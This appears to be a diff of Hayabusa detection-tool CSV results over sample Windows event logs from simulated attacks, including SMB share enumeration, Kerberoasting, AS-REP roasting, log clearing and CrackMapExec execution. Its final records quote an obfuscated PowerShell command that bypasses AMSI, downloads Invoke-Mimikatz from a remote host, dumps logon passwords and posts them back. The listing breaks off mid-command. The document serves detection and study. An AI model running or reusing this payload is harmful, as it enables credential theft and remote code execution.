+2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer:  | IP Addr: 192.168.1.2 | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer:  | IP Addr: 192.168.1.2 | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: 192.168.1.100 | LID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer:  | IP Addr: 192.168.1.200 | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k